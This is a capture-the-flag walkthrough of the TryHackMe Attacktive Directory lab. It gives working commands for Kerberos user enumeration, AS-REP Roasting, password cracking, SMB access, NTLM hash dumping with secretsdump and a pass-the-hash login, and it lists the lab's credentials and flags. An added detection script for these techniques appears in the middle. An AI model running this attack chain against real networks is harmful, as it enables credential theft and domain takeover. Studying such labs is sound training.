TRYHACKME ATTACKTIVE DIRECTORY ROOM WRITE-UP

Walk-throughs
4 min read · Aug 30, 2021

On connection

Running nmap to view open ports and services

Add the DNS domain name to /etc/hosts, then access the IP via the browser

On the browser:

This is IIS from Microsoft

Try to enumerate any user using the enum4linux tool

We got nothing

Installing the tool kerbrute for enumeration

The above shows the different subcommands the tool offers for enumerating different items, e.g. users through userenum, which takes --dc <ip address>, -d <domain name> and a list of common usernames.

Command:

./kerbrute_linux_amd64 userenum --dc 10.10.61.114 -d spookysec.local userlist.txt

The tool returns the usernames from userlist.txt that exist in the domain

We can now use the impacket toolkit to enumerate users as well as perform AS-REP Roasting.

AS-REP Roasting is possible when a user account has the option “Does not require Pre-Authentication” set. This means that a Kerberos ticket can be requested for that account without first proving knowledge of its password, so the reply for that account can be requested by anyone and cracked offline.

The script is GetNPUsers.py

Command: GetNPUsers.py spookysec.local/ -usersfile userenum.txt -format hashcat -outputfile ./getnpusers -dc-ip 10.10.61.114

Checking the content of the output file

We identify that only the user svc-admin is susceptible to AS-REP Roasting
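From the defender's side, the two steps above (username enumeration with kerbrute and AS-REP Roasting with GetNPUsers.py) both leave traces in Windows Security Event ID 4768 on the domain controller. The following detection logic is an added example and not part of the original write-up; the event records are constructed to mimic 4768 fields, the usernames other than svc-admin and backup are invented, and the enumeration threshold is an assumed tuning value.

```python
from collections import defaultdict

# Constructed records modelled on the fields of Windows Security Event ID 4768
# (Kerberos authentication ticket requested). They are invented for this example,
# not real events from the lab; only the field semantics follow the real event:
#   status  - Kerberos result code (0x0 success, 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN)
#   preauth - Pre-Authentication Type ("0" = none, "2" = PA-ENC-TIMESTAMP, "-" on failure)
#   etype   - Ticket Encryption Type (0x17 = RC4-HMAC, 0x12 = AES256, 0xffffffff on failure)
SAMPLE_4768 = [
    {"user": "user01",    "src": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"user": "user02",    "src": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"user": "user03",    "src": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"user": "svc-admin", "src": "10.10.14.5", "status": "0x0", "preauth": "0", "etype": "0x17"},
    {"user": "backup",    "src": "10.10.14.5", "status": "0x0", "preauth": "2", "etype": "0x12"},
    {"user": "user04",    "src": "10.10.20.7", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
]

# Assumed tuning value: how many distinct unknown principals from one source
# before we call it enumeration rather than a typo.
ENUM_THRESHOLD = 3


def detect_kerberos_abuse(events, enum_threshold=ENUM_THRESHOLD):
    """Return (indicator, source_ip, detail) tuples for the two behaviours above."""
    findings = []
    unknown_by_src = defaultdict(set)
    for ev in events:
        # Username enumeration: the KDC answers 0x6 for principals that do not
        # exist, so many different names failing with 0x6 from one host is the
        # footprint a tool like kerbrute userenum leaves.
        if ev["status"] == "0x6":
            unknown_by_src[ev["src"]].add(ev["user"])
        # AS-REP roasting: a successful TGT request that used no pre-authentication
        # (type 0) and RC4 (0x17), i.e. an AS-REP that can be cracked offline.
        elif ev["status"] == "0x0" and ev["preauth"] == "0" and ev["etype"] == "0x17":
            findings.append(("asrep_roast", ev["src"], ev["user"]))
    for src, users in sorted(unknown_by_src.items()):
        if len(users) >= enum_threshold:
            findings.append(("user_enum", src, sorted(users)))
    return findings


if __name__ == "__main__":
    for kind, src, detail in detect_kerberos_abuse(SAMPLE_4768):
        print(f"{kind:12} from {src}: {detail}")
```

Event 4768 is only written when the "Audit Kerberos Authentication Service" subcategory is enabled on the domain controllers; the underlying fix is to clear the "Does not require Kerberos preauthentication" flag on accounts that do not need it.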

We then make use of hashcat to crack the hash and get the password

Password = management2005

Alternatively, one can use John the Ripper to crack it, which is simpler

List the SMB shares using the smbclient tool

Command: smbclient -L 10.10.61.114\\ -U svc-admin

When prompted for a password, use the one we found above for the svc-admin user

Try to access the shares one by one to find out which one you are allowed to access. In this case, we are allowed to access the backup share

Command: smbclient -U svc-admin //10.10.61.114/backup

Use the more command to read the content of the file

Output:

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decode the base64 string to get the password

Command: echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d

The decoded string is backup@spookysec.local:backup2517860, i.e. the user is backup (backup@spookysec.local) and the password is backup2517860

Dump the hashes for all users.

Command: secretsdump.py spookysec.local/backup:'backup2517860'@10.10.61.114 -just-dc-ntlm

Interesting user and hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

We can now use evil-winrm to log in as this user without having to crack the hash

Command: evil-winrm -i 10.10.61.114 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Now logged in, find out where you are in the system.

Navigate through and look for the flag

It's in the Desktop directory, in a file named root.txt

Flag for administrator= TryHackMe{4ctiveD1rectoryM4st3r}

Move to the Users directory and go into each user's directory to find the flags

Flag for svc-admin = TryHackMe{K3rb3r0s_Pr3_4uth}

Flag for backup = TryHackMe{B4ckM3UpSc0tty!}

Have fun!!
